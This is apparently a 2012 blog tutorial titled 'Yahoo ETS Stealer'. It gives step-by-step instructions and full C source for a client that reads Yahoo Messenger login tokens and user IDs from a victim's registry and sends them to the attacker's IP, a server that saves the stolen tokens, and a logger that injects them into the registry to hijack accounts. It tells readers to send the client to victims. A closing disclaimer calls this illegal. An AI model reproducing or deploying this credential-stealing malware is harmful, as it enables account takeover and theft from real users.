joi, 23 februarie 2012

Yahoo ETS Stealer

This is a tutorial on how to steal a Yahoo ETS.


For those of you who don't know, an ETS is a string coded in the Yahoo64 algorithm that can be used to log in to Yahoo! Messenger, and from there to Yahoo! Mail.

It is located in the Windows registers, under HKEY_CURRENT_USER -> Software -> Yahoo -> pager.

If you have an user's ETS and ID, you can log in to his account by doing the following:
1)Open Yahoo! Messenger and check the "Remember Id & password" box
2)Open regedit (start -> run -> regedit)
3)Navigate to HKEY_CURRENT_USER -> Software -> Yahoo -> pager
4)Modify the values of ETS and Yahoo! User ID to the values that you have stole
5)Set the Auto Login value to 1
6)If you have Yahoo Messenger open, close it
7)Open Yahoo Messenger


If you have done everything right, it should log you in as the user that you typed under the Yahoo! User ID value.

Next, I will give you the source code of 3 programs that can be used to steal a Yahoo ETS:
server - is used to receive the ETS and user id from the client and save it as a .txt file
client - 'steals' the victim's ETS and user id
logger - is used to log you in using to the stolen accounts

The programs are written in C. I used Visual Studio 2010 to compile them.
You should place the server and the logger in the same folder in your computer.
After that open the server, send the client to a victim and wait until you receive the password (usually just a few seconds after he opens it). A new .txt file will appear in the folder where you have the server app. Next, open the logger, and log in the the victims account.

NOTE: you should replace 127.0.0.1 with your ip in the client app before compiling it and sending it to the victim. 


SERVER:
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#define DEFAULT_PORT "27015"
#define DEFAULT_BUFLEN 512
#pragma comment(lib, "ws2_32.lib")


int main() {
 FILE* fisier;
 WSADATA wsaData;
 int iResult;
 iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
 if (iResult != 0) {
  printf("Eroare. %d", iResult);
  return 0;
 }
 struct addrinfo *result = NULL,
     *ptr = NULL,
     hints;

 ZeroMemory( &hints, sizeof(hints) );
 hints.ai_family = AF_INET;
 hints.ai_socktype = SOCK_STREAM;
 hints.ai_protocol = IPPROTO_TCP;
 hints.ai_flags = AI_PASSIVE;

 // Resolve the local address and port to be used by the server
 iResult = getaddrinfo(NULL, DEFAULT_PORT, &hints, &result);
 if ( iResult != 0 ) {
  printf("getaddrinfo failed: %d\n", iResult);
  WSACleanup();
  return 1;
 }
 SOCKET ListenSocket = INVALID_SOCKET;
 ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
 if (ListenSocket == INVALID_SOCKET) {
  printf("Error at socket(): %ld\n", WSAGetLastError());
  freeaddrinfo(result);
  WSACleanup();
  return 1;
 }
 
 // Setup the TCP listening socket
 iResult = bind( ListenSocket, 
  result->ai_addr, (int)result->ai_addrlen);
 if (iResult == SOCKET_ERROR) {
  printf("bind failed: %d\n", WSAGetLastError());
  freeaddrinfo(result);
  closesocket(ListenSocket);
  WSACleanup();
  return 1;
 }
 if ( listen( ListenSocket, SOMAXCONN ) == SOCKET_ERROR ) {
    printf( "Error at bind(): %ld\n", WSAGetLastError() );
    closesocket(ListenSocket);
    WSACleanup();
    return 1;
 }
 SOCKET ClientSocket;

 ClientSocket = INVALID_SOCKET;

 // Accept a client socket
 int contorParole = 1;
 while (true) {
  ClientSocket = accept(ListenSocket, NULL, NULL);
  if (ClientSocket == INVALID_SOCKET) {
   printf("accept failed: %d\n", WSAGetLastError());
   closesocket(ListenSocket);
   WSACleanup();
   return 1;
  }
  char recvbuf[DEFAULT_BUFLEN];
  int recvbuflen = DEFAULT_BUFLEN;
  iResult = recv(ClientSocket, recvbuf, recvbuflen, 0);
  if (iResult > 0) {
   printf("Password nr. %d received.\n", contorParole);
  }
  else if (iResult == 0)
   printf("Connection closing...\n");
  else  {
   printf("recv failed: %d\n", WSAGetLastError());
   closesocket(ClientSocket);
   WSACleanup();
   return 1;
  }
  recvbuf[iResult] = '\0';
  char numeFisier[128];
  int aux = 0;
  while (recvbuf[aux] != '$') {
   numeFisier[aux] = recvbuf[aux];
   aux++;
  }
  numeFisier[aux] = '\0';
  strcat(numeFisier, ".txt");
  numeFisier[aux+4] = '\0';
  fisier = fopen(numeFisier, "w");
  fprintf(fisier, "%s", &recvbuf[aux+1]);
  fclose(fisier);
  contorParole++;
 }
 system("pause");
 return 0;
}
CLIENT:
#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")

#define DEFAULT_BUFLEN 512
#define DEFAULT_PORT "27015"

typedef struct regentry{
 char nume[256];
 DWORD tip;
 byte data[256];
} regentry;

int __cdecl main(int argc, char **argv) 
{
 int contor = 0;
 char sendbufmeu[512];
 regentry valori; 
 int i = 0;
 DWORD lenNumeValoare = 255, lenData = 511;
 char subkey[] = "Software\\Yahoo\\Pager";
 HKEY cheie; 
 if(RegCreateKeyEx(HKEY_CURRENT_USER, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_QUERY_VALUE, NULL, &cheie, NULL)!=ERROR_SUCCESS){
  printf("Eroare la deschidere cheie!");
  return 1;
 }
 if(RegEnumValue(cheie, i, valori.nume, &lenNumeValoare, NULL, &valori.tip, valori.data, &lenData)!=ERROR_SUCCESS){
  printf("Eroare. %d", GetLastError());
 }
 do{
  i++;
  if(!strcmp(valori.nume, "ETS") || !strcmp(valori.nume, "Yahoo! User ID")) {
   if(contor==0){
    strcpy(sendbufmeu, (char*)valori.data);
    strcat(sendbufmeu, "$");
    contor++;
   }
   else
    strcat(sendbufmeu, (char*)valori.data);
  }
  lenNumeValoare = 255; lenData = 511;
 }while(RegEnumValue(cheie, i, valori.nume, &lenNumeValoare, NULL, &valori.tip, valori.data, &lenData) != ERROR_NO_MORE_ITEMS);

    WSADATA wsaData;
    SOCKET ConnectSocket = INVALID_SOCKET;
    struct addrinfo *result = NULL,
                    *ptr = NULL,
                    hints;
    char *sendbuf = "this is a test";
    char recvbuf[DEFAULT_BUFLEN];
    int iResult;
    int recvbuflen = DEFAULT_BUFLEN;
    
 char ip[] = "127.0.0.1";

    // Initialize Winsock
    iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
    if (iResult != 0) {
        printf("WSAStartup failed: %d\n", iResult);
        return 1;
    }

    ZeroMemory( &hints, sizeof(hints) );
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;

    // Resolve the server address and port
    iResult = getaddrinfo(ip, DEFAULT_PORT, &hints, &result);
    if ( iResult != 0 ) {
        printf("getaddrinfo failed: %d\n", iResult);
        WSACleanup();
        return 1;
    }

    // Attempt to connect to an address until one succeeds
    for(ptr=result; ptr != NULL ;ptr=ptr->ai_next) {

        // Create a SOCKET for connecting to server
        ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, 
            ptr->ai_protocol);
        if (ConnectSocket == INVALID_SOCKET) {
            printf("Error at socket(): %ld\n", WSAGetLastError());
            freeaddrinfo(result);
            WSACleanup();
            return 1;
        }

        // Connect to server.
        iResult = connect( ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen);
        if (iResult == SOCKET_ERROR) {
            closesocket(ConnectSocket);
            ConnectSocket = INVALID_SOCKET;
            continue;
        }
        break;
    }

    freeaddrinfo(result);

    if (ConnectSocket == INVALID_SOCKET) {
        printf("Unable to connect to server!\n");
        WSACleanup();
        return 1;
    }

    // Send an initial buffer
    iResult = send( ConnectSocket, sendbufmeu, (int)strlen(sendbufmeu), 0 );
    if (iResult == SOCKET_ERROR) {
        printf("send failed: %d\n", WSAGetLastError());
        closesocket(ConnectSocket);
        WSACleanup();
        return 1;
    }
    // shutdown the connection since no more data will be sent
    iResult = shutdown(ConnectSocket, SD_SEND);
    if (iResult == SOCKET_ERROR) {
        printf("shutdown failed: %d\n", WSAGetLastError());
        closesocket(ConnectSocket);
        WSACleanup();
        return 1;
    }

    // cleanup
    closesocket(ConnectSocket);
    WSACleanup();
    return 0;
}
LOGGER:
#include "stdafx.h"
#include <Windows.h>

#define LEN 512

typedef struct users{
 char numeFisier[256];
 char numeFaraExt[256];
 //add here
 } users;

int _tmain(int argc, _TCHAR* argv[])
{
 HANDLE firstFile;
 int i = 0;
 users fisiere[1024];
 char currentPath[LEN];
 GetCurrentDirectory(LEN, currentPath);
 strcat(currentPath, "\\*.txt");
 WIN32_FIND_DATA winFD;
 if((firstFile = FindFirstFile(currentPath, &winFD)) == INVALID_HANDLE_VALUE) {
  printf("error %d.", GetLastError());
  return 0;
 }
 int x;
 do {
  strcpy(fisiere[i].numeFisier, winFD.cFileName);
  strcpy(fisiere[i++].numeFaraExt, winFD.cFileName);
  for (x = 0; fisiere[i-1].numeFisier[x] != '\0'; x++);
  fisiere[i-1].numeFaraExt[x-4] = '\0';
  x = 0;
 }while(FindNextFile(firstFile, &winFD) != 0);
 int j = 0;
 while(j < i) 
  printf("%-4d%s\n",j+1, fisiere[j++].numeFaraExt);
 printf("\nTastati indicele userului pe care vreti sa va logati apoi apasati Enter: \n");
 int user;
 printf("->");
 scanf("%d", &user);
 HANDLE toHack;
 toHack = CreateFile(fisiere[user-1].numeFisier, FILE_READ_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
 byte continut[LEN];
 DWORD biticititi;
 ReadFile(toHack, continut, LEN, &biticititi, NULL);
 HKEY cheieReg;
 byte autoLog[4];
 for(i = 0; i < 4; i++)
  autoLog[i] = 0;
 autoLog[0] = 1;
 DWORD al = 1; 
 RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Yahoo\\pager", 0,  KEY_SET_VALUE, &cheieReg);
 RegSetKeyValue(cheieReg, NULL, "ETS", REG_SZ, continut, biticititi);
 RegSetKeyValue(cheieReg, NULL, "Yahoo! User ID", REG_SZ, fisiere[user-1].numeFaraExt, strlen(fisiere[user-1].numeFaraExt));
 RegSetKeyValue(cheieReg, NULL, "Auto Login", REG_DWORD, autoLog, 4);
 printf("\nInchideti mess-ul in cazut in care este pornit, apoi deschideti o fereastra de mess noua...\n");
 return 0;
}

Important note:
Stealing Yahoo ETS is illegal.
You should only use those programs on persons that give you specific permission to do so, and under no circumstances use them as hacking tools.